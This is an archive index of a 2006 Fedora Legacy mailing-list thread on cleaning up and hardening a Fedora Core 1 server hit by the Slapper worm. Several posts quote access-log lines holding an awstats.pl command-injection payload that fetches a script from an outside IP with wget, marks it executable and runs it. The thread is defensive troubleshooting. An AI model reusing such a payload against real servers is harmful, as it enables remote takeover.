Re: slapper worm

2006-01-24 Thread Peter J. Holzer
On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. This doesn't really prevent execution

Re: slapper worm

2006-01-24 Thread Michael Mansour
Hi Peter, On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: More generally, I read advice somewhere that mounting /tmp with the noexec option (and making any other temp directories symbolic links to that one) can make this type of attack much more difficult. This doesn't really

Re: slapper worm

2006-01-24 Thread Peter J. Holzer
On 2006-01-24 22:13:26 +1000, Michael Mansour wrote: Hi Peter, On 2006-01-24 08:46:24 +1000, Michael Mansour wrote: Definitely noted as one of the measures to stop this type of attack, but for this particular server, /tmp is not a mounted filesystem but part of /, so I can't

Re: slapper worm

2006-01-24 Thread Jason Edgecombe
Michael Mansour wrote: Hi Marc, On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote: No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when

Re: slapper worm

2006-01-24 Thread James Kosin
Jesse Keating wrote: On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE for the ssl issue? I'd

Re: slapper worm

2006-01-24 Thread Mike McCarty
James Kosin wrote: Jesse Keating wrote: On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE

Re: slapper worm

2006-01-24 Thread Mike Klinke
On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been stamped out years ago? Read the link I posted yesterday,

Re: slapper worm

2006-01-24 Thread G. Roderick Singleton
On Tue, 2006-01-24 at 13:20 -0600, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and variations of it) haven't all been

Re: slapper worm

2006-01-24 Thread Mike McCarty
Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why is it that this exploit (and

Re: slapper worm

2006-01-24 Thread James Kosin
Mike McCarty wrote: --snip-- $ ps -A | grep pache $ ps -A | grep ssl doesn't show anything, so Apache isn't running, and I guess SSL isn't either. Mike Mike, ps -A | grep httpd /* Apache is only the name of the server

Re: slapper worm

2006-01-24 Thread Michael Mansour
Hi Mike, You should do a netstat -na | grep SYN, if you see a lot of those then slapper is there DOS attacking people. $ netstat -na | grep SYN $ Thanks for the advice. But, as I am behind a stealth firewall, I feel relatively secured against *this* type of attack. Umm, what does

Re: slapper worm

2006-01-24 Thread Mike Klinke
On Tuesday 24 January 2006 14:00, Gene Heskett wrote: If this file mentioned on the site doesn't exist on any of my systems, is it safe to assume relative safety against this attack? As Michael Mansour discovered, he had this file on only one of three FC1 machines after he installed Drupal,

Re: slapper worm

2006-01-24 Thread kles koe
of the Fedora Legacy Project fedora-legacy-list@redhat.com To: Discussion of the Fedora Legacy Project fedora-legacy-list@redhat.com Subject: Re: slapper worm Date: Tue, 24 Jan 2006 13:08:52 -0600 James Kosin wrote: Jesse Keating wrote: On Mon, 2006-01-23

Re: slapper worm

2006-01-24 Thread Gene Heskett
On Tuesday 24 January 2006 15:18, Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper going back to 2002. Why

Re: slapper worm

2006-01-24 Thread Gene Heskett
On Tuesday 24 January 2006 15:29, Mike McCarty wrote: Mike McCarty wrote: Gene Heskett wrote: On Tuesday 24 January 2006 14:20, Mike Klinke wrote: On Tuesday 24 January 2006 13:08, Mike McCarty wrote: I'm a little shocked at this, frankly. I Googled around, and found mentions of the Slapper

Re: slapper worm

2006-01-23 Thread James Kosin
Michael Mansour wrote: Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1, but in analysing now how

Re: slapper worm

2006-01-23 Thread Michael Mansour
Hi James, Michael Mansour wrote: Hi guys, I have an FC1 machine which got infected twice with the slapper worm, and then started DOS attacking a large vendor. I've stopped slapper in its tracks with a couple of changes to FC1,

Re: slapper worm

2006-01-23 Thread Jesse Keating
On Mon, 2006-01-23 at 15:42 -0500, James Kosin wrote: Michael, Try my version of httpd here: http://support.intcomgrp.com/~jkosin It has been effective against the worm so far. James, what is in your package that we haven't included in our Apache? I was under the assumption that we had

Re: slapper worm

2006-01-23 Thread Kelson
Michael Mansour wrote: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows

Re: slapper worm

2006-01-23 Thread James Kosin
Jesse Keating wrote: James, what is in your package that we haven't included in our Apache? I was under the assumption that we had fixed all the CVEs related to the slapper worm and that our users were safe. If this isn't the case, we have a

Re: slapper worm

2006-01-23 Thread Michael Mansour
Hi Kelson, Michael Mansour wrote: 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo| HTTP/1.1 403 344 - Mozilla/4.0

Re: slapper worm

2006-01-23 Thread Jesse Keating
On Mon, 2006-01-23 at 17:11 -0500, James Kosin wrote: My version takes care of the mod_ssl issue he already disabled. FC1 doesn't have a fix or if so it hasn't gone through QA yet. Do you have a CVE for the ssl issue? I'd like to see if it is somewhere in the QA pipeline. -- Jesse

Re: slapper worm

2006-01-23 Thread Marc Deslauriers
On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote: I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? What version of php are you running? Marc.

Re: slapper worm

2006-01-23 Thread Michael Mansour
Hi Marc, On Tue, 2006-01-24 at 06:32 +1000, Michael Mansour wrote: I'm using: perl-5.8.3-17.4.legacy httpd-2.0.51-1.9.legacy openssl-0.9.7a-33.13.legacy Are there any updates FL can do to any of the packages to fix/block slapper from an FC1 machine? What version of php are

Re: slapper worm

2006-01-23 Thread Michael Mansour
Hi Marc, On Tue, 2006-01-24 at 08:42 +1000, Michael Mansour wrote: No I'm not sure. Reading through the link above, it does seem that you've hit the nail on the head with this one. I have two other FC1 machines and they weren't affected by Slapper (even when the 3rd one was). The FC1

Re: slapper worm

2006-01-23 Thread Mike Klinke
On Monday 23 January 2006 14:32, Michael Mansour wrote: 403 344 - Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;) 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft